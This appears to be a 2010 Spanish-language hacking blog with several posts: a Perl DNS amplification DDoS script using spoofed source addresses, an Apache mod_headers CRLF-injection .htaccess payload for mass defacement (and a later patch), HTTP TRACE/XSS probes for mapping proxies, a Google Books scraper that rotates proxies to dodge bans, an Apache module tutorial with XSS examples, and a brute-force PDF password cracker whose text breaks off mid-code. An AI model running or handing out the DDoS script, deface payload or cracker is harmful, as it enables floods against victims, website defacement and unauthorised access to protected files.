Blog de Xianur0

Hacking Television

2010-09-01T21:11:00.000-07:00

Hacking Television es un nuevo proyecto, que se ha iniciado con varios compañeros, en este vamos a colgar papers, vídeos e imagenes, como novedad este blog (aparte de transmisiones en vivo y vídeo archivo), se integra temáticas como es el hardware hacking (molificación de objetos cotidianos, modding extremo, etc...) y muchas cosas mas. Solo me resta invitarlos a que lo visiten (también las donaciones son bien recibidas... el hardware no es gratuito y tampoco se cuenta con patrocinio xD jeje).

http://hackingtelevision.blogspot.com/

DNS Amplification (explicacion y PoC con Net::RawIP y Net::DNS)

2010-06-08T17:20:00.000-07:00

Net::RawIP es un modulo/libreria de perl, que nos permite hacer gran cantidad de cosas, entre las cuales esta enviar paquetes spoofeados (tcp, udp, icmp, generic), vamos a ver un ejemplo de ello, un PoC de DNS Amplification que me arme por ahi usando esta libreria.

Vamos a explicar la tecnica en cuestion (el codigo ya esta comentado xD)

¿por que es eficiente?

Vamos a dar un ejemplo con dig:

xianur0@Zer0-Null:~/Net-RawIP-0.25$ dig @192.168.1.254 . ANY

; <<>> DiG 9.6.1-P2 <<>> @192.168.1.254 . ANY
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53160;; flags: qr rd ra; QUERY: 1, ANSWER: 14, AUTHORITY: 0, ADDITIONAL: 11;; QUESTION SECTION:;. IN ANY;; ANSWER SECTION:. 452834 IN NS c.root-servers.net.. 452834 IN NS e.root-servers.net.. 452834 IN NS f.root-servers.net.. 452834 IN NS d.root-servers.net.. 452834 IN NS b.root-servers.net.. 452834 IN NS j.root-servers.net.. 452834 IN NS g.root-servers.net.. 452834 IN NS l.root-servers.net.. 452834 IN NS h.root-servers.net.. 452834 IN NS k.root-servers.net.. 452834 IN NS m.root-servers.net.. 452834 IN NS a.root-servers.net.. 452834 IN NS i.root-servers.net.. 66297 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2010060800 1800 900 604800 86400;; ADDITIONAL SECTION:e.root-servers.net. 538845 IN A 192.203.230.10f.root-servers.net. 539272 IN A 192.5.5.241f.root-servers.net. 600142 IN AAAA 2001:500:2f::fd.root-servers.net. 538814 IN A 128.8.10.90b.root-servers.net. 538838 IN A 192.228.79.201j.root-servers.net. 538827 IN A 192.58.128.30j.root-servers.net. 600142 IN AAAA 2001:503:c27::2:30g.root-servers.net. 538716 IN A 192.112.36.4l.root-servers.net. 538832 IN A 199.7.83.42l.root-servers.net. 157464 IN AAAA 2001:500:3::42h.root-servers.net. 538823 IN A 128.63.2.53;; Query time: 1328 msec;; SERVER: 192.168.1.254#53(192.168.1.254);; WHEN: Tue Jun 8 16:00:21 2010;; MSG SIZE rcvd: 497

es decir, nosotros solicitamos el registro any de un punto (root/raiz), y el servidor DNS nos respondio con el listado de los servidores DNS root de internet.

a cualquier servidor DNS que preguntemos esto por lo regular respondera con dicho listado. Ahora si nosotros enviamos un paquete DNS (como se ha dicho con el origen spoofeado xD) preguntando esto mismo, el servidor DNS respondera a la victima, por lo cual este ataque se amplifica (es mucho mayor lo que el servidor DNS envia que lo que nosotros enviamos).

Ahora va el PoC:

Código:

#!/usr/bin/perl

# By Xianur0
# uxmal666@gmail.com

use Net::DNS;
use Net::RawIP qw(:pcap);

print "\t\tDNS Amplification Attack By Xianur0\n\n";
my $usage = "\nUso: $0 [victima] [servidor] [Puerto victima (udp)] [N. Paquetes] [Registro]\n";

die $usage unless $ARGV[0] && $ARGV[1] && $ARGV[2] && $ARGV[3] && $ARGV[4];

my $fuckingvar1=$ARGV[0];
my $fuckingvar2=$ARGV[1];
my $fuckingvar4=$ARGV[2];
my $fuckingvar5='53';
my $registro = $ARGV[4];
my $domain = ".";
my $fuckingvar6 = 4000;
$fuckingvar6 = $ARGV[3] if ($ARGV[3] != 0);

my $packet_r = Net::DNS::Packet->new($domain, $registro, "IN"); # creamos el paquete
my $udp_r = new Net::RawIP({ip=> {saddr=>$fuckingvar1, daddr=>$fuckingvar2}, udp=>{source=>$fuckingvar4, dest=>$fuckingvar5}}); # especificamos los valores (IP Spoofeada, destino (victima), puerto origen (puerto a donde se enviara la respuesta del DNS) y destino)

print "Enviando...\n";
for($fuck = 0; $fuck < $fuckingvar6; $fuck++) {
  $udp_r->set({udp=>{data=>$packet_r->data}});
  $udp_r->send();
}


print "Enviado!\n";

Bytez xianur0

Analisis de red mediante HTTP

2010-06-05T11:37:00.000-07:00

Antes que nada aclaro que se requiere conocimientos previos sobre el funcionamiento del HTTP, no se va a explicar el funcionamiento, solo va a mostrar los mecanismos de analisis...

Supongamos, nosotros tenemos una transferencia HTTP con web.com. Lo que podemos ver a simple vista es la respuesta que nos da, pero mas haya, nos interesa saber como esta estructurada la conexion al servidor, es decir, que puntos/proxys/balanceadores de carga hay?

Y por que nos seria util saber eso?, por varias razones, por ejemplo si determinamos la estructura que hay, podemos analizar las reglas de cada uno de los proxys y por consiguiente utilizarlo para algo "no tan bueno". Sin mas comenzemos:

de inicio vamos a utiliza webs reales, pero ocultando las direcciones, para evitarnos problemas....
Solo llames a estas webs: www.servidor1.com y www.servidor2.com.

La prueba que siempre nos sera de utilidad es la del TRACE:

TRACE / HTTP/1.0
Host: www.servidor1.com
X: <script>alert(/xss/.source)</script>

Esta prueba nos ayudara a determinar si se edito el paquete en algun punto de la red antes de llegar al servidor, es decir, la respuesta aproximada a esta consulta deberia de ser:

HTTP/1.1 200 OK
Date: Sat, 05 Jun 2010 17:20:26 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: message/http

50
TRACE / HTTP/1.1
Host: www.servidor1.com
X: <script>alert(/xss/.source)</script>


0

suponiendo que el servidor solo envia datos con Transfer-encoding chunked.

esto es, se responde como contenido lo que enviamos, en caso de que la respuesta sea diferente, quiere decir que tenemos algo en la red, del mismo modo podemos extraer datos de eso, es decir segun cabeceras añadidas en el envio, se pueden determinar algunas cosas, por ejemplo:

HTTP/1.0 200 OK
Date: Sat, 05 Jun 2010 17:23:46 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.12
Content-Type: message/http
X-Cache: MISS from wefwfg
X-Cache-Lookup: NONE from wefwfg:80
Via: 1.0 wefwfg:80 (squid/2.6.STABLE5)
Connection: close

TRACE / HTTP/1.0
Host: www.servidor2.com
Via: 1.1 wefwfg:80 (squid/2.6.STABLE5)
X-Forwarded-For: 189.xx.xx.xx
Cache-Control: max-age=259200
Connection: keep-alive

esto es, primero que nada podemos ver en el encabezado:

X-Cache: MISS from wefwfg
X-Cache-Lookup: NONE from wefwfg:80
Via: 1.0 wefwfg:80 (squid/2.6.STABLE5)

Para comenzar ahi podemos determinar que se utiliza un servidor proxy cache llamado wefwfg, el usa el puerto 80, y es un squid/2.6.STABLE5, de momento ya sabemos que hay un servidor proxy cache implicado, pero eso no es todo.

TRACE / HTTP/1.0
Host: www.servidor2.com
Via: 1.1 wefwfg:80 (squid/2.6.STABLE5)
X-Forwarded-For: 189.xx.xx.xx
Cache-Control: max-age=259200
Connection: keep-alive

El proxy cache agrega las cabeceras Via, X-Forwarded-For, Cache-Control y Connection.

Lo que enviamos al servidor fue (en este caso):

TRACE / HTTP/1.1
Host: www.servidor2.com

Y ese envio no coincide con lo que le llego al servidor....

Ahora otro detalle: se envio la cabecera X-Forwarded-For, con mi ip, esto quiere decir, que a simple vista, no hay otro servidor proxy antes de este squid, en otras palabras, el servidor principal, al cual nos conectamos fue: wefwfg, y este realizo la conexion al servidor donde se encuentra www.servidor2.com

Ahora nos queda determinar si se balancea la carga (es decir que hubiera mas servidores en esto...), como podriamos hacer esto?, mediante un envio recursivo de datos, lo mas comun es detectar cabeceras Date, que no coincide (es decir, fallan por 1 minuto, 1 hora, 1 año, o mas...) o alguna diferencia en otra cabecera que marque tiempo o algo similar que pueda variar en caso de tratarse de otro servidor.

Pero no estas conformes con estas tecnicas, por la simple razon de que no funcionan en todos los servidores, es decir si el proxy no edita la respuesta, si no envia via o cabeceras similares o el servidor web no soporta TRACE, entonces no funcionaran, vamos a ver algunas mas:

GET http://localhost/ HTTP/1.1
Host: localhost
Connection: Close
Proxy-Connection: Close

Esto es una trampa doble, para comenzar, se pide localhost, es decir si hay un proxy este intentara conectarse a si mismo en el puerto 80, lo cual por lo regular causaria un bucle infinito (en caso de ser un proxy sin filtro para esto), un 403 o un 500. Pero adicional a eso pueden aver algunos otros datos:

HTTP/1.1 403 Forbidden
Date: Sat, 05 Jun 2010 17:20:32 GMT
Content-Length: 257
Content-Type: text/html
Server: NetCache appliance (NetApp/5.4R2D2)

Tenemos un 403, y aparte en la cabecera Server, tenemos datos del servidor proxy, en este caso un NetCache (Version 5.4R2D2).

Ahora dije que era una trampa doble, como podran notar agrege 2 tokens para la conexion (encabezados Connection y Proxy-Connection), es decir, en caso de no recibir un 403 o 500, podemos recibir en el encabezado de la respuesta un Connection: close o un Proxy-Connection: Close.

Un servidor web comun no utiliza Proxy-Connection, un proxy si...

Ahora podemos usar eso mismo con otra clase de consultas y ayudaria bastante...

Ahora regresando a lo del balanceo de cargas, lo mas eficiente para estos casos, aparte de revisar que las cabeceras no cuadren con lo que deberian, se puede forzar al servidor a mostrarse, como?

mediante un envio recursivo de paquetes, es decir, podemos determinar cuando un servidor cambie por ciertos detalles por ejemplo:

un servidor soporta 3 paquetes por conexion persistente, es decir:

GET / HTTP/1.1
Host: servidor2.com
Connection: keep-alive

GET / HTTP/1.1
Host: servidor2.com
Connection: keep-alive

GET / HTTP/1.1
Host: servidor2.com
Connection: close

y respondera a esas 3 consultas en la misma conexion, pero a la siguiente consulta, soporta 4?, ahi detectamos que son servidores diferentes...

Otro:

Enviamos varias consultas con diferentes metodos, determinamos que metodos soporta y si en otra vuelta, no soporta algun metodo, es lo mismo, es otro servidor...

Bueno concluimos con este paper diciendo lo siguiente: la seguridad es solo un mito, los proxys invisibles no existen, siempre hay una forma de detectar cuando algo que esta ahi, no deberia estar ahi ;)...

PD: para mas informacion y mas tecnicas, asistir a mi conferencia en x25sec xd jajajaj

Saludos!, esto es todo por el momento... xD....

Parchando mod_headers

2010-05-07T09:07:00.000-07:00

Bueno ahora viene la forma de parchar el mod_headers (apache2)...

Primero que nada se requiere el mod_headers.c (viene en cualquier paquete de codigo fuente del apache), luego viene lo siguiente:


static int nocrlf(char *val) {
 ap_regex_t *regex;
 ap_regcomp(&regex, "\n",AP_REG_EXTENDED);
 if(ap_regexec(&regex, val, 0, NULL, 0) != 0) {
  return 1;
 }
return 0;
}

esa funcion retorna 1 en caso de que no tenga crlf lo que le demos como parametro, de lo contrario 0... esto es mediante expresiones regulares (nadamas buscamos un \n y es todo xD...).

la podemos colocar en cualquier lado (no importa mucho donde declaramos esta funcion), en mi caso lo puse en la linea 510...

lo siguiente es hacer que no setie las cabeceras cuando tienen crlf...

busquemos:


       switch (hdr->action) {

y justamente antes ponemos:


 if(nocrlf(process_tags(hdr, r)) == 1)

esto es, si hay crlf en el header no se entra al switch, de modo que no se setea la cabecera...

listo, ya tenemos el mod_headers parchado, ahora nos toca instalarlo:


root@Zer0-Null:/usr/local/apache2/bin# ./apxs -cia /home/xianur0/httpd-2.3.5-alpha/modules/metadata/mod_headers.c

bueno eso fue en mi caso, nadamas hay que posicionarnos en la ruta donde este instalado nuestro apache, y buscar el apxs (tiene que estar instalado, de otro modo tendriamos que recompilar el apache :S...) y darle la ruta del mod_headers.c

y ahora ya, tenemos parchado mod_headers y nuestro apache :)...

Apache mod_headers Mass Defacement

2010-05-05T15:46:00.000-07:00

Autor: Xianur0 (Oscar García López)
CCAT Research Labs
Versiones afectadas: de momento se ha probado y todas las apache2 son afectadas, probablemente tambien la 1.3 pero no se ha realizado la prueba.
Parche: de momento ninguno, pero luego programamos uno :)...

Bueno este bug/detalle viene siendo algo muy simple, pero tiene bastante utilidad, es local, se requiere permisos para crear un .htaccess, y lo siguiente va de la siguiente forma:

Apache habia restringido las cabeceras que se pueden rescribir, por ejemplo Content-Length quedo bloqueada para basicamente todas las funciones, de modo que no se puede falsificar facilmente un content-length, pero pasa lo siguiente, mod_headers no filtra correctamente los CRLF, y apache no detecta que cabeceras se crean mediante el CRLF/LF, entonces tenemos lo siguiente:

Header set Last-Modified "Xianur0 Was Here\nContent-Length: 25"
Header set xianur0 "Xianur0 Was Here\nContent-Length: 25\n\n<h1>Xianur0 Was Here</h1>"

este .htaccess lo que haria seria rescribir la cabecera Last-Modified (esta cabecera es de las primeras en crearse), de modo que nuestra cabecera quedara antes que el content-length real, ahora hay diferencia entre el manejo de cabeceras que tienen los navegadores, por ejemplo google chrome, lee solo la primera cabecera y las siguientes repetidas son ignoradas, por el contrario firefox hace basicamente lo mismo que apache, va leyendo las cabeceras repetidas y remplazando el valor anterior por el de la cabecera mas reciente, de modo que nuestro .htaccess ya contempla esos detalles, primero edita Last-Modified (para que quede antes que el content-length real), y luego crea una cabecera "xianur0", con valor "Xianur0 Was Here", y en cada una pone un salto de linea ("\n"), y seguido de eso crea las cabeceras Content-Length que sustituiran a la real, luego en la ultima cabecera que se escribe, se insertan otros dos saltos de linea, y tenemos que lo siguiente queda en la seccion de html, los navegadores comunes, leen unicamente la cantidad de caracteres especificados en el content-length, de modo que todo lo siguiente despues de eso 25 que se especificaron, es ignorado.

y listo, tenemos un deface automatico de todas las paginas, nada se editar, solo se crea el .htaccess, pero a la vista de cualquier navegador la web estaria completamente defaceada :)...

HTTP/1.1 200 OK
Date: Wed, 05 May 2010 22:36:17 GMT
Server: Apache/2.3.5 (Unix)
Last-Modified: Xianur0 Was Here
Content-Length: 25
ETag: "1a4558-2d-432a5e4a73a80"
Accept-Ranges: bytes
Content-Length: 45
xianur0: Xianur0 Was Here
Content-Length: 25

<h1>Xianur0 Was Here</h1>
Content-Type: text/html

<html><body><h1>It works!</h1></body></html>

En resumen, apache bloquea la rescritura del Content-Length y otras cabeceras, pero no se requiere rescribirlas, unicamente crear otras en diferentes lugares y el funcionamiento interno de los navegadores y la inestabilidad del protocolo HTTP completan el proceso :)...

Bytez...

[Perl] Google Books Downloader

2010-05-03T15:42:00.001-07:00

En pocas palabras, lo que hace es descargar dentro de la carpeta tmp (que tiene que estar creada en el mismo directorio que el perl), todas las paginas del libro especificado, las descarga una por una como imagen, no he tenido tiempo de buscar otra manera, pero creo que de momento es util para lo que esta planeado (bajar los libros para poder leerlos offline)...

esta diseñado para books.google.es, pero basta con cambiar el .es por .com (o lo que sea xD) y funcionara igual ;)...


xianur0@Zer0-Null:~$ perl gobookdownloader.pl 0EzERMZHkTIC 0 240 200.219.244.122:80
[-] Consulta inicial realizada, tenemos la cookie: PREF=ID=c882825959dda2ec:TM=1272916829:LM=1272916829:S=jA_XjmG4h8KbYi8K
http://books.google.es/books?id=0EzERMZHkTIC&pg=PA1&img=1&zoom=3&hl=es&sig=ACfU3U2Xm9aZPXoDIMgy91oaU-I0t892Dg
Descargada pagina: 0
http://books.google.es/books?id=0EzERMZHkTIC&pg=PA1&img=1&zoom=3&hl=es&sig=ACfU3U2Xm9aZPXoDIMgy91oaU-I0t892Dg
Descargada pagina: 1
http://books.google.es/books?id=0EzERMZHkTIC&pg=PA1&img=1&zoom=3&hl=es&sig=ACfU3U2Xm9aZPXoDIMgy91oaU-I0t892Dg
Descargada pagina: 2
http://books.google.es/books?id=0EzERMZHkTIC&pg=PA5&img=1&zoom=3&hl=es&sig=ACfU3U1cFZ1iIemGZygZ9-QCXiQSQoJLHg
Descargada pagina: 3
http://books.google.es/books?id=0EzERMZHkTIC&pg=PA6&img=1&zoom=3&hl=es&sig=ACfU3U0BFY-HtIbIjoEIdsvgcnKPhpeX8g
Descargada pagina: 4
http://books.google.es/books?id=0EzERMZHkTIC&pg=PA6&img=1&zoom=3&hl=es&sig=ACfU3U0BFY-HtIbIjoEIdsvgcnKPhpeX8g
Descargada pagina: 5
http://books.google.es/books?id=0EzERMZHkTIC&pg=PA6&img=1&zoom=3&hl=es&sig=ACfU3U0BFY-HtIbIjoEIdsvgcnKPhpeX8g
Descargada pagina: 6
http://books.google.es/books?id=0EzERMZHkTIC&pg=PA11&img=1&zoom=3&hl=es&sig=ACfU3U3G4_FjT1tZ4UR2Fl4Dh20ETPf8vw
Descargada pagina: 7
http://books.google.es/books?id=0EzERMZHkTIC&pg=PA12&img=1&zoom=3&hl=es&sig=ACfU3U1q4ErPv7WAB9OP3AYpAyAOvz-Q1A
Descargada pagina: 8
http://books.google.es/books?id=0EzERMZHkTIC&pg=PA13&img=1&zoom=3&hl=es&sig=ACfU3U2BQMNwDuVjuZkiUv_zZXXd1AAHmw
[...]

en la siguiente version programo que pase las imagenes a un PDF (para poder leer mas comodamente los libros).

Ahora sin mas el codigo:


#!/usr/bin/perl
use LWP::UserAgent;
# Google Books Downloader by Xianur0
# uxmal666@gmail.com
# nota: este codigo solo fue diseñado con la utilidad de poder leer los libros de forma offline
# el autor no se hace responsable del uso que se le de.
$ua = LWP::UserAgent->new;
$id = $ARGV[0];
$inicio = $ARGV[1];
$final = $ARGV[2];
$proxy = $ARGV[3];
die("Google Books Downloader by Xianur0\nUso: perl gobookdownloader.pl [id_libro] [pag. inicial] [pag. final] [Proxy (opcional)]") if($final eq "");
$cookie = "";
$contador = 0;

sub descargar {
$aurl = $_[0];
$id = $_[1];
$cookie = $_[2];
$proxya = $_[3];
$extencion = ".jpg";
($contenido,$cookie, $tipo) = consultar($aurl,$cookie,"http://books.google.es/books?id=".$id."&printsec=frontcover&source=gbs_slider_thumb",$proxya);
if($contenido ne "") {
if($tipo eq "image/jpeg") {
$extencion = ".jpg";
}
if($tipo eq "image/png") {
$extencion = ".png";
}
else {
$extencion = ".jpg";
}
open(ARCHIVO,">tmp/".$id."-".$contador.$extencion);
binmode ARCHIVO;
print ARCHIVO $contenido;
close(ARCHIVO);
print $aurl."\n";
print "Descargada pagina: ".$contador."\n";
$contador++;
}
}

sub consultar {
$url = $_[0];
$cookie = $_[1];
$urlini = $_[2];
$proxy = $_[3];
my $contettype = "";
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9");
$ua->proxy(['http'] => 'http://'.$proxy) if($proxy ne "");
$req = HTTP::Request->new(GET => $url);
$req->header('Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
$req->header('Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
$req->header('Cache-Control' => 'max-age=0');
$req->header('Cookie' => $cookie);
$req->header('Referer' => $urlini) if($urlini ne "");
$res = $ua->request($req);
if ($res->is_success) {
$contenido = $res->content;
$respuesta = $res->as_string;
if($respuesta =~ /Set-Cookie: (.*?);/) {
$cookie = $1;
}
if($respuesta =~ /Content-Type: (.*?)\r?\n/) {
$contettype = $1;
}
} else {
if($res->status_line =~ /(500 Can't connect to|503 Service Unavailable)/) {
die("[x] IP Baneada (o proxy ".$proxy." invalido), usar otro proxy...\n");
}
return ("",$cookie,"text/html");
}
return ($contenido,$cookie,$contettype);
}
print "\t\t\t\tGoogle Books Downloader by Xianur0\n";
$urlbase = "http://books.google.es/books?id=".$id."&printsec=frontcover&source=gbs_slider_thumb";
($contenido,$cookie,$tipo) = consultar($urlbase,$cookie,"",$proxy);
print "[-] Consulta inicial realizada, tenemos la cookie: ".$cookie."\n";
for($i = $inicio;$i<=$final;$i++) {
$estaurl = '
http://books.google.es/books?id='.$id.'&lpg=PP1&pg=PA'.$i.'&jscmd=click3';
($contenido,$cookie,$tipo) = consultar($estaurl,$cookie,$urlbase,$proxy);
($iurl)  = ($contenido =~ /^{"page":\[{"pid":".*?","src":"(.*?)"/);
$iurl =~ s/\\u0026/&/g;
if($iurl ne "") {
descargar($iurl,$id);
} else { $final++; }
}
print "Descargado exitosamente! :)\n";

Programacion de mod apache for dummies Capitulo 1

2010-04-14T15:17:00.000-07:00

Bue me decidi por escribir un ligero curso sobre programacion de mods de apache, y bueno este es el primer capitulo xD.

Notas previas:

1ro: Se requiere un minimo de conocimientos de programacion C/C++.
2do: Se requiere tener apache instalado mod_so (no voy a explicar como hacerlo xD) y apxs.

Antes que nada que vendria siendo un mod? (vaya si comenzaste a leer el texto y no sabes ni de que se trata esto es para ti xD)

Un mod (llamemoslo asi), es una extencion para apache, imaginemos que apache es un framework donde corremos nuestras aplicaciones, las aplicaciones vendrian siendo los mods, es decir una aplicacion que utiliza las respectivas APIs de apache, controla cualquier funcion realizada por el servidor, y basicamente cualquier otra cosa dentro del servidor apache (obviamente esto no se reduce a solo actuar sobre apache, pero digamos que desde apache se ejecutara todo)

Dynamic Shared  Object

El servidor HTTP Apache es un programa modular en el que el administrador puede elegir qué funcionalidades se incluyen mediante la selección de un conjunto de módulos. En primer lugar, los módulos pueden compilarse de manera estática en el binario httpd. De forma alternativa, los módulos también pueden compilarse como Objetos Dinamicos Compartidos (DSOs) que existen de forma independiente del archivo binario httpd. Los módulos que se deseen usar como objetos dinámicos compartidos pueden compilarse al mismo tiempo que el servidor, o pueden compilarse en otro momento y ser añadidos después usando la Herramienta de Extensión de Apache (apxs).

(Citado de la web oficial de apache xD)

Ahora sin mas, vamos a comenzar....


#include <http_protocol.h>
#include <http_config.h>
#include <http_core.h>

static int helloworld_handler(request_rec* r)
{
if (!r->handler || strcmp(r->handler, "helloworld"))
 return DECLINED;

if (r->method_number != M_GET)
 return HTTP_METHOD_NOT_ALLOWED;

ap_set_content_type(r, "text/html");
ap_rputs("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\">\n", r);
ap_rputs("<html><head><title>Hi!</title></head>", r);
ap_rputs("<body><h1>Tu IP: </h1>", r);
ap_rputs(r->connection->remote_ip,r);
ap_rputs("<h1>URI: </h1>",r);
ap_rputs(r->uri,r);
ap_rputs("<h1>Request: </h1>",r);
ap_rputs(r->the_request,r);
int *contentlength = apr_pstrdup(r->pool, apr_table_get(r->headers_in, "Content-Length"));
if(contentlength) {
ap_rputs("<h1>Content-Length: </h1>",r);
ap_rputs(contentlength,r);
}
ap_rputs("</h1></body></html>",r);
return OK;
}

static void register_hooks(apr_pool_t* pool)
{
ap_hook_handler(helloworld_handler, NULL, NULL, APR_HOOK_MIDDLE);
}

module AP_MODULE_DECLARE_DATA helloworld_module = {
STANDARD20_MODULE_STUFF,
NULL,
NULL,
NULL,
NULL,
NULL,
register_hooks
};

Vamos por partes...

#include <http_protocol.h>
#include <http_config.h>
#include <http_core.h>

Incluimos las librerias basicas a usar...


static int helloworld_handler(request_rec* r)
{
[...]

Aqui se define como tal las acciones a realizar, para comenzar se toma un parametro (r), el cual
podriamos resumir como el objeto que usaremos para enviar y tomar los datos del envio
(y algunos de la respuesta, pero no viene al caso en este capitulo).


if (!r->handler || strcmp(r->handler, "helloworld"))
 return DECLINED;

decimos que si no esta definido el handler "helloworld" en esta ejecucion, salgamos,
es decir si quitamos estas lineas el resto se ejecutaria en todos los directorios (al hacer consulta),
de modo que no se cargarian las webs en nuestro servidor, de modo que decimos que solo continue cuando este
definido el handler "helloworld", dicho handler lo podemos definir con un .htaccess:


SetHandler helloworld

Ese seria el ejemplo. Donde pongamos ese .htaccess se ejecutara nuestro mod.

Seguimos...


if (r->method_number != M_GET)
 return HTTP_METHOD_NOT_ALLOWED;

Esto seria opcional, unicamente checa que el metodo sea GET, de no ser GET tirara un 405.


ap_set_content_type(r, "text/html");

Seteamos el content-type de la respuesta a "text/html"


ap_rputs("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\">\n", r);
ap_rputs("<html><head><title>Hi!</title></head>", r);
ap_rputs("<body><h1>Tu IP: </h1>", r);
ap_rputs(r->connection->remote_ip,r);

Enviamos al navegador (r apuntando) el html inicial y su IP, esto mediante r->connection->remote_ip
Es decir: de r llamemos al metodo connection del cual pidamos remote_ip el cual nos retornara la ip del cliente.


ap_rputs("<h1>URI: </h1>",r);
ap_rputs(r->uri,r);

Aqui se imprime nuevamente un html y luego se imprime el "URI" que en dado caso vendria siendo el directorio
consultado que en mi caso seria: "/helloworld/" (ahi defini el handler).

Como tal es vulnerable a XSS:

GET http://localhost/helloworld/<script>alert('xss')</script> HTTP/1.1
Host: localhost

El resultado sera que nos lanze un bonito alert...

Pero no se preocupen que apache ya lo tiene resuelto, para ello usar ap_escape_html

Esto es:

ap_escape_html(r->pool,r->uri)

Resumiendo parchado quedaria:


ap_rputs("<h1>URI: </h1>",r);
ap_rputs(ap_escape_html(r->pool,r->uri),r);

Seguimos...


ap_rputs("<h1>Request: </h1>",r);
ap_rputs(r->the_request,r);

Lo que hace como es obvio imprime el request enviado, es decir la primera linea de la consulta HTTP:

GET /helloworld/%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1

Seria un ejemplo de lo que imprimiria, a simple vista pareseria que no hay XSS, pero...

GET http://localhost/helloworld/?asas=<> HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Wed, 14 Apr 2010 22:49:22 GMT
Server: Apache/2.3.5 (Unix)
Content-Length: 231
Content-Type: text/html;charset=ascii

<title>Hi!</title>
<h1<Tu IP: </h1>127.0.0.1
<h1>URI: </h1>/helloworld/
<h1>Request: </h1>GET http://localhost/helloworld/?asas=<> HTTP/1.1

Todo depende de la consulta que se se llama...

Lo mismo...

ap_rputs(ap_escape_html(r->pool,r->the_request),r);

y nuevamente solucionado...

Lo siguiente en la lista:

int *contentlength = apr_pstrdup(r->pool, apr_table_get(r->headers_in, "Content-Length"));
if(contentlength) {
ap_rputs("<h1>Content-Length: </h1>",r);
ap_rputs(contentlength,r);
}

Primero que nada se intenta tomar el valor de la cabecera Content-Length, luego si lo pudo tomar lo imprime. Hablando un poco mas tecnicamente, apache utilizar tables, que vendrian siendo como hashtables en otros lenguajes de programacion, o como una matriz con indice literal. Entonces utilizamos la funcion apr_table_get() para obtener el valor que nos interesa (en este caso el valor de Content-Length), si les interesa mas info al respecto de las hashes:

Introduction to the Apache table API

Muchos me diran ahi hay otro XSS!, pero no como tal, es decir:

Apache automaticamente valida el content-length, es decir si no es numerico, entero y mayor de 0, retorna un 413 equest Entity Too Large.

Aparte de que solo estamos permitiendo GET, asi que amenos que sea una aplicacion muy mal diseñada y que trabaje con html, no deberia haber tanto problema...

Claro que si no se sienten comodos, pueden filtrarlo de la misma forma que se hizo arriba xD...


ap_rputs("</h1></body></html>",r);
return OK;
}

Se imprime el final del html y retornamos OK (ejecucion correcta).

Hasta aqui vamos programado lo que va a hacer, pero como inicializarlo?, Eso hace el resto de codigo:


static void register_hooks(apr_pool_t* pool)
{
ap_hook_handler(helloworld_handler, NULL, NULL, APR_HOOK_MIDDLE);
}

module AP_MODULE_DECLARE_DATA helloworld_module = {
STANDARD20_MODULE_STUFF,
NULL,
NULL,
NULL,
NULL,
NULL,
register_hooks
};

Ahora nos queda instalar nuestro primer "helloworld" en apache:

Paso 1:
root@Zer0-Null:/usr/local/apache2/bin# ./apxs -cia /home/xianur0/Escritorio/mod_test.c
Paso 2:
root@Zer0-Null:/usr/local/apache2/bin# ./httpd -k restart

Si no hay problema en ninguno de los dos pasos, tendremos instalado nuestro modulo,
y si tambien ya hemos puesto el htaccess, nuestro primer modulo debe de estar funcionando :)

Bytez Xianur0

Prototipo: Crackeador PDF Java

2010-03-27T10:52:00.000-07:00

Ultimamente he estado algo fuera, por x.25sec, programando, diseñando, etc...
Pero entre ese tiempo tambien estoy diseñando algunos codigos individuales, en este caso un crackeador PDF, aun es un "prototipo", pues se podria mejorar mucho, bueno se los comparto, y se aceptan cualquier sugerencia para mejorar el funcionamiento :)...


package pdfcracker;
import java.io.IOException;
import java.util.logging.Level;
import java.util.logging.Logger;
import org.apache.pdfbox.pdmodel.PDDocument;
/**
 *
 * @author xianur0
 */
class TestTh extends Thread {
    private String filename;
    private String passs;
    private int caractermin = 32;
    private int caractermax = 127;
    private static PDDocument document = null;
    public static int passwd[];
    public static int largopass = 1;
    public static boolean available = false;
    public TestTh(String filename, int caractermina, int caractermaxa, PDDocument documento, int pass[]) {
        caractermin = caractermina;
        caractermax = caractermaxa;
        passwd = pass;
        document = documento;
        }
   public synchronized String aumentar()
   {
            while(available == true) {
            try {
                wait();
            } catch (InterruptedException e) { }
       }
        available = true;
int tamarray = passwd.length;
passwd[tamarray-1]++;
for(int posicion = tamarray-1;posicion>=0;posicion--) {
if(passwd[posicion] > caractermax) {
    if(posicion == 0) {
    largopass++;
    System.out.println(new StringBuilder().append("Aumentado a ").append(largopass).append(" caracteres").toString());
    int tmp[] = new int[tamarray+1];
    for(int ia = tamarray-1;ia>=0;ia--) {
    tmp[ia+1] = passwd[ia];
    if(ia == 0) tmp[0] = caractermin;
    }
passwd = tmp;
    passwd[1] = caractermin;
   tamarray++;
    } else {
            passwd[posicion] = caractermin;
            passwd[posicion-1]++;
    }
}
}
    StringBuilder passbuff = new StringBuilder();
for(int posicion = 0;posicion<tamarray;posicion++)
   passbuff.append((char) passwd[posicion]);
notifyAll();
return passbuff.toString();
}
        public synchronized Boolean comprobar(String filename,String pass) {
           while(available == false) {
            try {
                wait();
            } catch (InterruptedException e) { }
       }
                   available = false;
            try {
                 if(!document.isEncrypted()) {
             System.out.println("Archivo no encriptado!");
      System.exit(1);
         } else {
                document.decrypt(pass);
            }
        } catch (Exception ex) {
        }
        if(!document.isEncrypted()) {
            notifyAll();
return true;
        } else {
         notifyAll();
return false;
 }
}
    public void run() {
        while(true) {
                passs = aumentar();
                if(comprobar(filename,passs)) {
                   System.out.println(new StringBuilder().append("Password encontrada: ").append(passs).toString());
                   System.exit(0);
                }
        }
    }
    }


public class Main {
    static String filename = "";
    static int threadsausar = 1;
    static int caractermin = 48;
